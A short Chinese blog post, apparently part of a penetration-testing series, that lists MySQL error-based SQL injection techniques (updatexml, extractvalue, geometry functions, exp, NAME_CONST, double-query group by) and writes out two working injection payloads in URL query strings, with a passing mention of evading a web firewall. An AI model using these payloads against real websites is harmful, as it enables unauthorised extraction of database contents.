别人的渗透测试(三)--SQL显错注入

续上一章。

安全狗拦下7成的人,过狗是门学问,偷笑.jpg。很感谢和https://home.cnblogs.com/u/xishaonian/ 博主能一起研究过狗。

说多了,言归正传SQL注入大显错。只适用MYSQL,其它数据库没学呢...

1、count,rand,floor

2、updatexml()【最大长度限制32位】

3、extractvalue()【最大长度限制32位】

4、geometrycollection()

5、multipoint()

6、polygon()

7、multipolygon()

8、linestring()

9、multilinestring()

10、exp()

11、NAME_CONST(适用于低版本)

?id=3&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

12、Error based Double Query Injection

id=99+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1

13、以后再添加

2和3只能返回32位长度,如果想再多返回字符串,请使用分页或者截取字符串。/偷笑

前十个博客中如下:

http://www.cnblogs.com/MiWhite/p/6384711.html
http://www.cnblogs.com/MiWhite/p/6254336.html
http://www.cnblogs.com/MiWhite/p/6241265.html

SQL注入的方式好多,待老夫慢慢总结,莫着急。

各位拜拜~下章见。

原文地址:https://www.cnblogs.com/MiWhite/p/6931075.html